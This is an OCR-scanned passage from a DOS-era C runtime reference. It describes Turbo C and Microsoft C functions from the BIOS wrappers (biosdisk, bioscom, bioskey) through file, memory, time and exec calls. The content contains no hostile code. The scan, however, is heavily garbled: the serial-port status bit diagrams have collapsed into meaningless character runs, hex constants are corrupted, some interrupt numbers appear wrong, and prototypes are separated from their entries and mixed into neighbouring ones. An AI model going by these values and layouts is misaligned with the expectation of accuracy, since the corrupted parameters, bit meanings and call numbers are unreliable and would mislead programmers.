= _DISK_READ read disk sectors (INT 13,2) 
= _DISK_WRITE write disk sectors (INT 13,3) 


- dskinfo = pointer to structure containing disk information: 


struct diskinfo_t 


{ 

unsigned drive; - physical drive number 
unsigned head; - head number 

unsigned track; - track number 

unsigned sector; - sector number 
unsigned nsectors; - sectors to deal with 
void _far *buffer; - data buffer 

}; 


- returns status of operation (AX register, AH contains status) 
- drive numbers represent physical drives (0 = A:, 1 = B:, 
80h = drive 0, 81h = drive 1 
- disk reads should be retried at least 3 times 
- Turbo C uses -biosdisk-() 


- see -INT 13- 
:_bios_equiplist 
AMSC: unsigned _bios_equiplist( void ) 


- prototype in bios.h 


- returns flags found in BIOS data area at 40:10 & 40:11 
- Turbo C uses -biosequip-() 
- see -INT 11- 

:_bios_keybrd 

AMSC: int _bios_keybrd( int cmd ) 


- prototype in bios.h 
- cmd = _KEYBRD_READ return next keystroke w/o echo (INT 16,0) 
_KEYBRD_READY test if key avail; O=none (INT 16,1) 
_KEYBRD_SHIFTSTATUS return shift key status (INT 16,2) 
_NKEYBRD_READ return next keystroke w/o echo (INT 16,10) 
_NKEYBRD_READY test if key avail; O=none (INT 16,11) 
_NKEYBRD_SHIFTSTATUS return shift key status (INT 16,12) 


- AND returned value with 0x00FF to get ASCII value 
- _NKEYBRD_READ, _NKEYBRD_READY, _NKEYBRD_SHIFTSTATUS are available 
on AT and newer machines only 
- Turbo C uses -bioskey-() 
- see -INT 16- 
:_bios_memsize 
AMSC: unsigned _bios_memsize( void ) 


- prototype in bios.h 

- returns memory size in 1Kk blocks (16..640K) 
- Turbo C uses -biosmemory-() 

- see -INT 12- 


:_bios_printer 
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% unsigned _bios_printer(unsigned cmd,unsigned port,unsigned data) 


prototype in bios.h 


cmd = _PRINTER_WRITE print character (INT 17,0) 
= _PRINTER_INIT initialize printer port (INT 17,1) 
= _PRINTER_STATUS read port status (INT 17,2) 

port = printer port; O=LPT1, 1=LPT2 

data = value to write 


returns status of printer (INT 17, AX reg, AH contains status) 
Turbo C uses —biosprint-() 
see -INT 17- 


:_bios_serialcom 
AMSC: unsigned _bios_serialcom(unsigned cmd, unsigned port, unsigned fmt) 


prototype in bios.h 


_COM_INIT initialize port (INT 14,0) 

_COM_SEND send character (INT 14,1) 

_COM_RECEIVE read character from port (INT 14,2) 
_COM_STATUS get serial port status (INT 14,3) 


cmd 


fmt = combination of the following: 
_COM_CHR7  _COM_CHR8 
_COM_STOP1 _COM_STOP2 


_COM_NOPARITY _COM_EVENPARITY _COM_ODDPARITY 
_COM_110 _COM_150 _COM_300 
_COM_600 _COM_1200 _COM_2400 


_COM_4800 —_COM_9600 


returns status word (INT 14, AX reg, modem status in AL, 
port status in AH) 

Turbo C uses -bioscomm-() 

see -INT 14- 


:_bios_timeofday 
AMSC: unsigned _bios_timeofday( unsigned cmd, long *timeval ) 


prototype in bios.h 


_TIME_GETCLOCK get real time clock (INT 14,0) 
_TIME_SETCLOCK set real time clock (INT 1A,1) 


cmd 


returns current BIOS clock count 
Turbo C uses -biostime-() 
see -INT 1A- 


:bioscom 
ATC: int bioscom( int cmd, char byte, int port ) 


prototype in bios.h 
RS232 communications 
cmd O to set comm parms to value in byte 

to send char in byte out on RS232 line 


to receive char 
to return current port status 


WNH II 


port = 0 for COMI 
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- byt 


e 


1 for COM2 


2 for COM3 

3 for COM4 

= bitwise OR of following bits 

0x02 = 7 data bits 0x00 = 1 stop bit 
0x03 = 8 data bits 0x04 = 2 stop bits 
0x00 == no parity; 

0x08 == odd parity; 

0x18 == even parity 

0x00 = 110 bps 0x20 150 bps 

0x40 300 bps 00x60 600 bps 

0x80 = 1200 bps O©xa0 2400 bps 

O0xcO 4800 bps O©xe0 9600 bps 


- returns 16-bit integer, upper 8 bits are status & lower 8 bits 
depending on cmd sent 


37363 
3 3 
3 3 
3 3 
3 3 
3 3 
3 3 
3 


5 
3 
3 
3 
3 
3 


3 3 
3 3 


34333231303 low byte (AL) modem status 


3 3 AAAAA delta clear to send 
3 AAAAAA delta data set ready 


3 3 AAAAAAA trailing edge ring detector 

3 AAAAAAKA delta receive line signal detect 
AAAAAAAKA clear to send 

AAAAAAAAAA data set ready 


AAAAAAAAAKA ring indicator 


AAAAAAAAAAKA receive line signal detect 


3F3E3 
3 3 
3 3 
3 3 
3 3 
3 3 
3 3 
3 


D3 
3 
3 
3 
3 
3 


C3B3A39383 high byte (AH) line status 


3 3 
3 3 


3 s AAAAA data ready 
8 AAAAAA overrun error 


34 AE party rar 
3 AAAAAAAA framing error 

AAAAAAAAA break detect 

AAAAAAAAAA transmit holding register empty 


AAAAAAAAAKA transmit shift register empty 


AAAAAAAAAAAKA time out 


- MS C uses — bios_serialcomm-() 
-INT 14- 


- see 


:biosdisk 
% TC: 
% 


int biosdisk( int cmd, int drive, int head, int track, 


int sector, int nsects, void *buffer ) 


- prototype in bios.h 


- issues interrupt 0x13 for BIOS disk operations 
= (O=A:, 1=2nd floppy, 0x80=drive 0, 0x81=drive 1 
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(0) 


reset diskette system (hard disk drive reset) 


return status of last disk operation, ignore parms 
read nsects disk sectors, with starting sector 
defined by head, track, & sector, reading 512 bytes 
per sector into buffer 

write nsects disk sectors, with starting sector 
defined by head, track, & sector, writing 512 bytes 
per sector from buffer 

verify nsects disk sectors, with starting sector 
defined by head, track, & sector 

format a track defined by head & track, where buffer 
points to a table of sector headers to be written 


For XT or AT only: 


6 - formats a track & sets bad sector flags 
7 - formats drive beginning at specific track 
8 - returns current drive parms in irst 4 bytes of buffer 
9 - initializes drive-pair characteristics 
10 - long read (4 extra bytes per sector for ECC) 
11 - long write (4 extra bytes per sector for ECC) 
12 - disk seek 
13 - alternate disk reset 
14 - reads sector buffer 
15 - writes sector buffer 
16 - tests if named drive is ready 
17 - recalibrates drive 
18 - controller ram diagnostic 
19 - drive diagnostic 
20 - controller internal diagnostic 


- drive numbers represent physical drives (0 = A:, 1 = B:, 
80h = drive 0, 81h = drive 1 
- disk reads should be retried at least 3 times 
- MS C uses — bios_disk-() 
- see -—INT 13- for more return codes and more information 
:biosequip 
ATC: int biosequip( void ) 


- prototype in bios.h 


- returns integer showing equipment in system 
- MS C uses — bios_equiplist-() 
- see -—-INT 11- or -EQUIPMENT FLAGS- for bit meanings 
:bioskey 
ATC: int bioskey( int cmd ) 


- prototype in bios.h 


- keyboard operations 

- cmd = © return next keystroke w/o echo (INT 16,0) 
1 test if key waiting; ©O=none (INT 16,1) 

2 return shift key status (see INT 16,2) 


- AND returned value with 0x00FF to get ASCII value 
- Ctrl-Break causes "while (!bioskey(1))" to loop infinitely in 
Turbo C 2.0 and earlier since it places a zero in the keyboard queue 
- MS C uses — bios_keybrd-() 
- see -INT 16- 
:biosmemory 
ATC: int biosmemory( void ) 


- prototype in bios.h 
- returns BIOS size memory in 1K blocks 
- MS C uses — bios_memsize-() 
- see -INT 12- 
:biosprint 
ATC: int biosprint( int cmd, int byte, int port ) 
- prototype in bios.h 
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outputs byte to port 

port = 0 (LPT1) 

1 (LPT2), etc... 

= © (print byte); 

1 (init printer port); 
2 (get LPT status) 


cmd 


returns status of (values are or'd flags): 
0x01 time out (cmd=0 means output error) 
0x08 I/0 error 

0x10 selected 

0x20 out of paper 

0x40 acknowledge 

0x80 not busy 


MS C uses — bios_printer-() 
see -INT 17- 


:‘biostime 
ATC: int biostime( int cmd, long newtime ) 


prototype in bios.h 


reads or sets BIOS timer 

cmd = © returns current value of timer 
1 sets timer to value of newtime 

MS C uses — bios_timeofday-() 


:_bmalloc:_fmalloc:_nmalloc 


% MSC: void _based(void) *_bmalloc( _segment seg, size _t size ) 
% MSC: void far *_fmalloc( size_t size ) 
% MSC: void near *_nmalloc( size_t size ) 


:brk 


prototype in malloc.h 


size = number of bytes to allocate 
seg = base segment value 
malloc() maps to _fmalloc or _nmalloc based on memory model 


_fmalloc allocates memory outside the default data segment if 


possible 

returns pointer to allocated block or NULL on error; _bmalloc() 
function returns _NULLOFF on error 

these functions will allocate a zero length block 


Aint brk( void *endds ) 


:bsearch 


prototype in alloc.h (malloc.h for MS C) 


dynamically changes the amount of space allocated to the calling 
programs data segment. Amount of allocated space increases as 
the break value increases. 
returns 0 if 0K 

-1 with errno set to ENOMEM 


% void *bsearch( void *key, void *base, int nelem, int width, 


% 


int (*femp )()) 


prototype in stdlib.h 
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- does binary search for items in a table which is 
ALREADY sorted in ascending order 

- base points to Oth element of table 

- nelem contains number of entries in table 

- width contains number of bytes in each entry 

- key points to the search key 


- fcmp() points to comparison routine, where key and elem are 
passed to it as pointers. Function fcemp() returns: 


integer < 0 if search key < elem; 
integer = 0 if equal; 
returns > 0 if search key > elem 


- returns 0 if no match found, else address of first 
entry that matches 


:cabs 
Adouble cabs( struct complex z ) 
- prototype in math.h 
- returns absolute value of int n 
:calloc 
Avoid *calloc( unsigned count, unsigned sizeeach ) 
- prototype in stdlib.h & alloc.h (malloc.h for MS C) 
- allocates main memory 
- see -malloc-() 
:ceil 
Adouble ceil( double x ) 
- prototype in math.h 
- rounds up x 
:cgets 
Achar *cgets( char *s ) 
- prototype in conio.h 
- reads string from console 
- CR/LF combination is replaced by \0 
- before calling, s[0] should be the max length of string to input 
- on return, s[1] contains the actual string length 
- returns pointer to s[2], the actual data input 
:_chain_intr 
AMSC: void _chain_intr( void (interrupt far *target)() ) 
- prototype in dos.h 
- chains from one interrupt handler to another; sets up the 
stack as if the interrupt was called directly by pushing the 


flags and the original return address on the stack 
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- this function does not return to caller but returns to the 
code where the interrupt occurred 
- no corresponding function in Turbo C 


:chdir 
NAint chdir( const char *path ) 
- prototype in dir.h 


- changes current working directory to path. 
- returns 0 if 0K; else -1 with errno set to ENOENT 


:_chmod 

ATC: int _chmod( const char *filename, int func [,int attrib] ) 
- prototype in io.h, also include dos.h 
- if func = 0, returns access mode of file 


- if func = 1, sets access mode of file 
- attrib can be one of the following: 


Turbo C MSC 
FA_RDONLY _A_RDONLY 
FA_HIDDEN _A_HIDDEN 
FA_SYSTEM _A_SYSTEM 


- if func = 1, 
returns 0 if OK 
-1 with errno set to ENOENT or EACCES 


- if func = 0, returns MSDOS attribute 

: chmod 

Aint chmod( const char *filename, int permiss) 
- prototype in io.h, also include stat.h 


- changes access mode of file according to mask given by permiss, 
where permiss is: 


S_IWRITE 
S_IREAD 
S_IWRITE | S_IREAD 


- returns 0 if OK 
-1 with errno set to ENOENT or EACCES 


:_Clear87 
Aunsigned int _clear87( void ) 


- prototype in float.h 


- clears 8087/80287 status word & other exceptions 
- returns old status word 
- see — status87-() -_control87-() 

:clearerr 

Avoid clearerr( FILE *stream ) 


Pagina 521 di 991 


prototype in stdio.h 


resets error indication 
see -ferror-() 


:_Clearscreen 
AMSC: void far _clearscreen( short target ) 


:clock 


prototype in graph.h 


target = _GCLEARSCREEN clears screen 
= _GVIEWPORT clears current viewport 
= _GWINDOW clears current text window 
available in graphics mode only 
clears target area by filling with current background color 


Aclock_t clock( void ) 


:_close 


prototype in time.h 


returns elapsed processor time used by the calling process, 

or -1L on error 

C startup code retrieves the clock count as preparation for a 
later call to clock() (Turbo C++ and some versions of MS C) 
resolution is limited to 54ms for both MS C and Turbo C due 

to the dependency on INT 8 clock tics 

CLK_TCK is shouldn't be used unless CLOCKS_PER_SEC isn't available 
since the latter is defined by ANSI. 

MS C uses INT 21,2C to get the processor time with 1000 as the 
value of CLK_TCK 

Turbo C uses INT 1A,2 to get the processor time with 18 as the 
value of CLK_TCK 


Example usage: 
clock_t start, finish, duration; 


start = clock(); 

delay(2000); 

finish = clock(); 

duration = finish - start; 

printf("%ld - %ld = %ld tics\n", start, finish, duration); 


ATC: int _close( int fh ) 


:close 


prototype in io.h 


closes file fh where fh is file handle from — creat-(), -creat-(), 
-creatnew-(), -creattemp-(), -dup-(), -dup2-(), — open-(), or 
-open-(). 

use -fdopen-() to change file handle to file stream. 

does not write a Ctrl-Z to a text file on closing 

returns 0 if 0K; -1 & errno=EBADF 

MS C uses —- dos_close-() 


see -INT 21,3E- 


Aint close( int fh ) 
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- prototype in io.h 


- closes file fh where fh is file handle from — creat-(), -creat-(), 
-creatnew-(), -creattemp-(), -dup-(), -dup2-(), - open-(), or 


-open-() 


- use -fdopen-() to change file handle to file stream 
- does not write a Ctrl-Z to a text file on closing 
- returns 0 if 0K; else -1 & errno may be set of EBADF 


:_control87 


AMSC: unsigned _control87( unsigned new, 


% 


% 


% 


% 


% 


% 


- prototype in float.h 


unsigned mask ) 


- used to change floating point handling and exception masking 
- new = contains corresponding bit values for any bit set in "mask" 
to be moved into the coprocessor control word 
- mask = zero; gets floating-point coprocessor control word 
= non-zero; if any bit is set, the corresponding bit in 
"new" is moved into the coprocessor control word 
- returns floating-point coprocessor control word 
- default control word is the logical OR of: IC_AFFINE, RC_NEAR, 
PC_64, EM _DENORMAL, EM_UNDERFLOW, EM_INEXACT 


Control Word Mask and Bits 


interrupt exception control 


MCW_EM 

MCW_IC infinity control 
MCW_RC rounding control 
MCW_PC precision control 


Exception Masks 


EM_INVALID invalid 
EM_DENORMAL denormal 


EM_ZERODIVIDE zero divide 
EM_OVERFLOW overflow 
EM_UNDERF LOW underflow 


EM_INEXACT inexact (precision) 


Infinity Control 


IC_AFFINE 


affine 


IC_PROJECTIVE projective 


Rounding Control 


RC_CHOP truncate 
RC_UP round up 

RC_DOWN round down 
RC_NEAR near 


Precision Control 


PC_24 24 bits precision 
PC_53 53 bits precision 
PC_64 64 bits precision 


User Status Word Bits 
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SW_INVALID invalid 
SW_DENORMAL denormal 
SW_ZERODIVIDE zero divide 
SW_OVERFLOW overflow 
SW_UNDERFLOW underflow 
SW_INEXACT inexact precision 


% Invalid Subconditions (if SW_INVALID) 


SW_UNEMULATED unemulated instruction 
SW_SQRTNEG square root of a neg number 
SW_STACKOVERFLOW FP stack overflow 
SW_STACKUNDERFLOW FP stack underflow 


% Floating Point Errors 


FPE_INVALID 
FPE_DENORMAL 
FPE_ZERODIVIDE 
FPE_OVERFLOW 
FPE_UNDERFLOW 
FPE_INEXACT 
FPE_UNEMULATED 
FPE_SQRTNEG 
FPE_STACKOVERFLOW 
FPE_STACKUNDERFLOW 
FPE_EXPLICITGEN 


- see — clear87-() -_status87-() 
:coreleft 
% TC: unsigned coreleft( void ) 
% TC: unsigned long coreleft( void ) 


- prototype in alloc.h 
- returns a measure of unused memory (see -malloc-()) 
- return value is int for models tiny, small, medium 
return value is long for models compact, large, huge 

- no corresponding function in MS C 

: COS 

Adouble cos( double x ) 
- prototype in math.h 


- returns the cosine of angle x 
- x must be in radians 


:cosh 
Adouble cosh( double x ) 
- prototype in math.h 


- returns the hyperbolic cosine of angle x 
- x must be in radians 


: country 
ATC: struct country *country(int cntrycode,struct country *cntryp) 
- prototype in dos.h 
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- returns country-dependent information 


:cprintf 
Aint cprintf( char *format [, argument,...] ) 


- prototype in conio.h 


- sends formatted output to the console 
- TC use either direct memory writes or BIOS calls depending on the 
value of the external integer directvideo 
- see -PRINTF SPEC- for format specifications 
:Cputs 
Avoid cputs( char *s ) 


- prototype in conio.h 


- writes string s to console 
- TC: uses either direct memory writes or BIOS calls depending 
on the value of the extern directvideo 


:_creat 
ATC: int _creat( const char *fname, int attr ) 


- prototype in io.h, also include dos.h 


- creates new file (overwrites existing file) of filename with file 
attribute attr, for both read/write 
- attr can be a combination of the following 


FA_RDONLY set read only attribute 
FA_HIDDEN set hidden attribute 
FA_SYSTEM set system attribute 


- file is created in 0_BINARY mode 
- returns nonnegative integer if OK, else -1 


- uses DOS function -INT 21,3C- 
- MSC uses — dos_creat-() 


:creat 
Aint creat( const char *filename, int permis ) 
- prototype in io.h, also include stat.h 


- creates new file (overwrites existing file) of filename 
with access permission "permis" which is: 


S_IWRITE 
S_IREAD 
S_IWRITE | S_IREAD 


for permission to write, read or read/write. 


- file is created set to _fmode (0_TEXT or O_BINARY) 


:creatnew 
% TC: int creatnew( const char *fname, int attr ) 
% MSC: unsigned creatnew( const char *fname, unsigned attr, int fh ) 
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- prototype in io.h, also include dos.h 


- creates new file filename with file attribute attr: 
- attr consists of a combination of the following: 


FA_RDONLY set read only attribute 
FA_HIDDEN set hidden attribute 
FA_SYSTEM set system attribute 


- returns nonnegative integer if OK, else -1 

- file is created set to _fmode (0_TEXT or O_BINARY) 

- TC: returns nonnegative integer if OK, else -1 
MSC: return 0 if ok, or DOS error code 


:creattemp 
ATC: int creattemp( char *filename, int attr ) 


- prototype in io.h, also include dos.h 


- creates new file (overwrites existing file) of filename with file 
attribute attrib, for both read/write 
- attr consists of a combination of the following: 


FA_RDONLY set read only attribute 
FA_HIDDEN set hidden attribute 
FA_SYSTEM set system attribute 


- filename is a path name ending in a backslash (\}); when file is 
created, filename has a unique path name 
- file is created set to _fmode (0_TEXT or O_BINARY) 
- returns nonnegative integer if OK, else -1 
:cscanf 
NAint cscanf( const char *format [,argument,...] ) 


- prototype in conio.h 
- performs formatted input from console 
- see -SCANF- and -—SCANF SPEC- 
:ctime 
Achar *ctime( const long *clock ) 
- prototype in time.h 
- converts date and time to a string 
- clock is a long integer (such as that returned by time()) 
- generates a 26-character string for date and time 
- returns pointer to string 
:ctrlbrk 
ATC: void ctrlbrk( int (*fptr )(void) ) 
- prototype in dos.h 
- sets a new control-break handler function pointed to by fptr 
- if Ctrl-C hit, then function pointed to by fptr is called 


- use -longjmp-() to return to a given point in the program 
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:dieeetomsbin:dmsbintoieee:fieeetomsbin:fmsbintoieee 


% 
% 
% 
% 


MSC: int dieeetomsbin( double *srcdbl, double *dstdbl ) 
MSC: int dmsbintoieee( double *srcdbl, double *dstdbl ) 
MSC: int fieeetomsbin( float *srcflt, float *dstflt ) 
MSC: int fmsbintoieee( float *srcflt, float *dstflt ) 


- prototype in math.h 


dieeetomsbin() converts IEEE double to Microsoft double 
dmsbintoieee() converts Microsoft double to IEEE double 
fieeetomsbin() converts IEEE float to Microsoft float 
fmsbintoieee() converts Microsoft float to IEEE float 


- srcdbl and srcflt are pointers to source values 
- dstdbl and dstflt are pointers to the destination 
- returns © for success; 1 for failure (overflow) 


:difftime 
Adouble difftime( time_t time2, time_t timel ) 


- prototype in time.h 


- returns (time2-time1) difference in seconds (double) 


:disable:_disable 


% 
% 


TC: void disable( void ) 
MSC: void _disable( void ) 


- prototype in dos.h 


- disables all interrupts except NMI via -CLI- instruction 


:_displaycursor 
AMSC: short far _displaycursor( short flag ) 


:div 


% 
% 


- prototype in graph.h 


- flag = _GCURSORON turn cursor on 
_GCURSOROFF turn cursor off 
- cursor is normally turned off while in graphics mode; calling 
this function determines whether cursor is displayed upon 
exit from graphics mode 
- returns previous value of cursor state flag 


(c):ldiv 
MSC: struct _div_t div( int numer, int denom ) 
MSC: struct _ldiv_t ldiv( long int numer, long int denom ) 


- prototype in stdlib.h 


- divides numerator by denominator giving quotient and remainder 
- returns div_t or ldiv_t structure of the form: 


struct _div_t struct _ldiv_t 
{ 
int quot; long quot; 
int rem; long rem; 
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}; }; 


:_dos_allocmem 
AMSC: unsigned _dos_allocmem( unsigned size, unsigned *seg ) 


prototype in dos.h 


size = number of paragraphs to allocate 

seg = pointer to buffer to contain allocated segment value 
returns 0 on success or DOS error code on failure 

Turbo C uses -allocmem-() 

see -INT 21,48- 


:_dos_close 
AMSC: unsigned _dos_close( int handle ) 


prototype in dos.h 


handle is standard DOS file handle attained through —_dos_creat-(), 
-_dos_creat-(), -_dos_creatnew-(), -_dos_open-(), -dup-(), -open—() 
returns 0 on success or DOS error code on failure 

does not write a Ctrl-Z to a text file on closing 

see -INT 21,3E- 


:_dos_creat:_dos_creatnew 
% MSC: unsigned _dos_creatnew(char *fname, unsigned attr, int *handle) 
% MSC: unsigned _dos_creat(char *fname, unsigned attr,int *handle) 


prototype in dos.h 


fname = a valid DOS file name 

attr = DOS file attribute 

_A_RDONLY 

_A_HIDDEN 

_A_SYSTEM 

_A_ARCH 

handle = pointer to location to receive handle 

returns 0 on success or DOS error code on failure 

if file sharing is installed, file is opened in compatibility mode 
see —INT 21,3C- -—INT 21, 5B- 


:_dos_freemem 
AMSC: unsigned _dos_freemem( unsigned seg ) 


prototype in dos.h 


frees memory allocated via _dos_allocmem() or INT 21,49 
returns © on success or DOS error code 

Turbo C uses -freemem-() 

see -INT 21,49- 


:_dos_getdate 
AMSC: void _dos_getdate( struct dosdate_t *date ) 


prototype in dos.h 


date = pointer to structure to contain returned data of format: 


struct dosdate_t 


{ 
unsigned char day; - [1-31] 
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unsigned char month; - [1-12] 


unsigned int year; - [1980-2099] 
unsigned char dayofweek; - [0-6] = Sun..Sat 
}; 


- Turbo C uses -getdate-() 
- see -INT 21,2A- 
:_dos_getdiskfree 
% MSC: unsigned _dos_getdiskfree(unsigned drv,struct diskfree_t *spc) 


- prototype in dos.h 
- drive = 1= A:, 2 = B:, 3 = C:, ... 
- spc = structure to contains disk status information 


- returns 0 on success or DOS error code on failure 


struct diskfree_t 


i 
unsigned total _clusters; - count of all disk clusters 
unsigned avail _clusters; - free unallocated clusters 


unsigned sectors_per_cluster; 
unsigned bytes_per_sector; 


ti 


- Turbo C uses -getdfree-() 
- see -INT 21,36- 
:_dos_getdrive 
AMSC: void _dos_getdrive( unsigned *drive ) 


- prototype in dos.h 


- drive = pointer to buffer to receive drive number; 
O = A:, 1= B:, ... 
- Turbo C uses -getdisk-() 
- see -INT 21,19- 
:_dos_getfileattr 
AMSC: unsigned _dos_getfileattr( char *path, unsigned *attr ) 


- prototype in dos.h 


any valid DOS file name 
file attribute: 


- path 
- attr 


> 


_A_NORMAL 
_A_RDONLY 
_A_HIDDEN 
_A_SYSTEM 
_A_VOLID 

_A_SUBDIR 


_A_ARCH 


- returns zero on success; nonzero on failure 
- no corresponding function in Turbo C 
- see -INT 21,43- 
:_dos_getftime 
AMSC: unsigned _dos_getftime(int h,unsigned *date, unsigned *time) 


- prototype in dos.h 
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- h = open file handle 
- date = pointer to memory to receive file date 
- time = pointer to memory to receive file time 
- returns 0 on success or DOS error code 
- Turbo C uses -getftime-() 
- see -INT 21,57- -_dos_setftime-() 
:_dos_gettime 
AMSC: void _dos_gettime( struct dostime_t *time ) 


- prototype in dos.h 
- returns DOS time into "time" 


struct dostime_t 


i 

unsigned char hour; - [0-23] 

unsigned char minute; - [0-59] 

unsigned char second; - [0-59] 

unsigned char hsecond; - hundreths of a second 0-99 
}; 


- Turbo C uses -gettime-() 
- see — dos_setttime-() 
:_dos_getvect 
AMSC: void (interrupt far *_dos_getvect( unsigned intnum ))() 


- prototype in dos.h 


- intnum = interrupt to get address of (0..255) 
- returns far pointer to interrupt handler routine 


- Turbo C uses -getvect-() 

- see -INT 21,35- -_dos_setvect-() 
:_dos_keep 
AMSC: void _dos_keep( unsigned rc, unsigned size ) 


- prototype in dos.h 


- rc = return code to pass to parent process 
- size = number of paragraphs to remain resident 


- Turbo C uses -keep-() 
- see -INT 21,31- 
:_dos_open 
AMSC: unsigned _dos_open( char *fname, unsigned mode, int *handle ) 


- prototype in dos.h, fcntl.h (also include share.h) 


- fname = valid DOS file name 

- mode = file access permission (a logical or of the following) 
O_NOINHERIT file can't be inherited by child process 
O_RDONLY file is read only 

O_RDWR file is read/write 

O_WRONLY file is write only 

SH_COMPAT file sharing compatibility mode 

SH_DENYNONE file sharing deny neither read nor write 
SH_DENYRD file sharing deny read 

SH_DENYRW file sharing deny read/write 

SH_DENYWR file sharing deny write 
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- handle = pointer to memory to contain handle 
- does not creat files, they must currently exist (see — dos_creat-()) 
- returns 0 on success or DOS error code 


- Turbo C uses — open-() 


- see -INT 21,3D- — dos_close-() — dos_read-() 
-_dos_write-() -_dos_creat-() 
:_dos_read 
% MSC: unsigned _dos_read( int handle, void far *buffer, 
% unsigned count, unsigned *nread ) 


- prototype in dos.h 


- handle opened file handle 

- buffer receives data read from file 

- count = number of bytes to read 

- nread = receives the number of bytes actually read 
- returns © on success or DOS error code 


- Turbo C uses — open-() 


- see -INT 21,3F- -_dos_open-() -_dos_write-() -_dos_close-() 
:_dos_setblock 
% MSC: unsigned _dos_setblock( unsigned size, unsigned seg, 
% unsigned *maxsize ) 


- prototype in dos.h 


- size = new block size 
- seg = segment of DOS memory block to change 
- maxsize = size of buffer actually allocated if size not available 


- returns 0 on success or DOS error code on failure 


- Turbo C uses -setblock-() 

- see -INT 21, 4A- -_dos_allocmem-() -_dos_freemem-() 
:_dos_setdate 
AMSC: unsigned _dos_setdate( struct dosdate_t *date ) 


- prototype in dos.h 


- date = receives date information 

- returns 0 on success or DOS error code on failure 
- sets DOS date via INT 21,2B 

- DOS 3.3+ also sets CMOS clock 


- MS C uses — dos_setdate-() 
- see -INT 21,2B- -_dos_getdate-() 
:_dos_setdrive 
AMSC: void _dos_setdrive( unsigned drive, unsigned *count ) 


- prototype in dos.h 


- drive = drive to set as default; 1= A:, 2 = B:, : 

- count = receives simple count of total drives in system 

- does not return error if invalid drive is requested, use 
_dos_getdrive() to see if requested drive was set 

- Turbo C uses -setdisk-() 

- see -INT 21, E- -_dos_getdrive-() 
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:_dos_setfileattr 
AMSC: unsigned _dos_setfileattr( char *path, unsigned attr ) 


- prototype in dos.h 


- path = valid DOS file name 

- attr = file attribute (logical OR of the following): 
_A_ARCH 

_A_HIDDEN 

_A_NORMAL 

_A_RDONLY 

_A_SUBDIR 

_A_SYSTEM 

_A_VOLID 


- returns 0 on success or DOS error code on failure 


- see -INT 21,43- -_dos_getfileattr-() 
:_dos_setftime 
AMSC: unsigned _dos_setftime(int handle, unsigned date, unsigned time) 


- prototype in dos.h 


- handle = opened file handle 

- date = date to set last file write (see FILE ATTRIBUTES) 
- time = time to set last file write (see FILE ATTRIBUTES) 
- returns © on success or DOS error code on failure 


- Turbo C uses -setftime-() 

- see -INT 21,57-  — dos getftime-() -FILE ATTRIBUTES- 
:_dos_settime 
AMSC: unsigned _dos_settime( struct dostime_t *time ) 


- prototype in dos.h 

- time = structure containing new time values 

- returns 0 on success or DOS error code on failure 
- sets MS-DOS time via INT 21,2D 

- DOS 3.3+ also sets CMOS clock 


- Turbo C uses -settime-() 


- see -INT 21, 2D- -_dos_gettime-() 
:_dos_setvect 
% MSC: void _dos_setvect( unsigned intnum, 
% void (interrupt far *handler)() ) 


- prototype in dos.h 


- intnum = interrupt vector to set (0..255) 
- handler = new interrupt routine 


- Turbo C uses -setvect-() 


- see -INT 21,25- -_dos_getvect-() 
:_dos_write 
% MSC: unsigned _dos_write( int handle, void far *buffer, 
% unsigned count, unsigned *nbytes ) 


- prototype in dos.h 
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handle opened file handle 

buffer buffer of data to write to file 

count = number of bytes to write 

nbytes = receives the number of bytes actually written 
returns © on success or DOS error code on failure 


Turbo C uses — write-() 
see -INT 21, 40- -_dos_open-() -— dos_close-() -— dos_read-() 


:dosexterr 


% 
% 


TC: int dosexterr( struct DOSERR *errinfo ) 
MSC: int dosexterr( struct DOSERROR *errinfo ) 


prototype in dos.h 


returns extended error information (unique to MSDOS 3.0+) 

errinfo is pointer to DOSERR/DOSERROR structure (defined in dos.h) 
if ® returned, previous DOS call did not result in error 

see perror 


:dostounix 
ATC: long dostounix( struct date *dateptr, struct time *timeptr ) 


: dup 


prototype in dos.h 


converts date (as from -getdate-()) and time (as from -gettime-()) 
into UNIX format 


Aint dup( int handle ) 


: dup2 


prototype in io.h 


returns a new file handle that duplicates the old handle 
returns -1 on error 


Aint dup2( int oldhandle, int newhandle ) 


‘ecvt 


prototype in io.h 


returns a new file handle that duplicates the old handle 
equal to newhandle. If newhandle exists, the corresponding 
file is closed. 

returns -1 on error 


Achar *ecvt( double value, int ndigit, int *decpt, int *sign ) 


prototype in stdlib.h 


converts a floating pt number to a string of ndigit digits, 
returning pointer to that string 

decpt is position of decimal point (negative value means 
to left of returned digits) and sign is 0 if positive, 

else negative 


:_ellipse:_ellipse_w:_elipse_wxy 
% MSC: short _ellipse(short ctl,short x1,short y1,short x2,short y2) 
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% MSC: short _ellipse_ w( short ctl, double wx1, double wy1, 


% 


double wx2, double wy2 ) 


% MSC: short far _ellipse_ wxy(short ctl,struct _wxycoord far *pwxy1, 


% 


:enable 
% 
% 


:eof 


struct _wxycoord far *pwxy2 ) 
prototype in graph.h 
ctl = _GFILLINTERIOR fill ellipse with current fill mask 
_GBORDER don't fill ellipse 
returns nonzero value if ellipse is drawn ok, zero otherwise 


center of ellipse is center of bounding rectangle specified by 
supplied coordinates 


see —- setfillmask-() 


:_enable 


TC: void enable( void ) 
MSC: void _enable( void ) 


prototype in dos.h 


enables all interrupts via -STI- instruction 


Aint eof( int handle ) 


+eXec.. 


prototype in io.h 


returns 1 if end of file for file associated with handle, 
O if not end of file 
-1 if bad file number 


». 1EXEC 


NExec Function Call 


int execl(pathname, argo, arg1, arg2, ...,argN, NULL ) 

int execle(pathname, argO, arg1, arg2,...,argN, NULL, envp ) 
int execlp(pathname, arg0, arg1, arg2,...,argN, NULL ) 

int execlpe(pathname, arg0, arg1, arg2, ....,argN, NULL, envp ) 


char *pathname, *argo, *arg1, *arg2,....,*argN, *envp[]; 


int execv(pathname,arg, NULL ) 
int execve(pathname, arg, NULL, envp ) 
int execvp(pathname, arg, NULL ) 
int execvpe(pathname, arg, NULL, envp ) 


char *pathname, *arg[],*envp[]; 
prototype in process.h 


loads and runs child processes 

pathname search based on MS-DOS search algorithm 

o if no extension or period - search for exact file name - 
if not found, add .exe and search again 

o if extension given, search only for exact file name 

o if period given, search for file name with no extension 


arg0 can be the same as the pathname 
at least one argument must be passed 
combined argument list cannot exceed 128 bytes 
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exit 


execl..: argo, arg1,...,argN passed as SEPARATE arguments 
execv..: arg[0], arg[1],...,arg[N] passed as argument ARRAY 
execlp, execlpe, execvp, execvpe: search for child in PATH 
returns no value if 0K, 

returns -1, with errno set to: 


E2BIG (too many args) 

EACCES (permission denied) 
EMFILE (too many open files) 
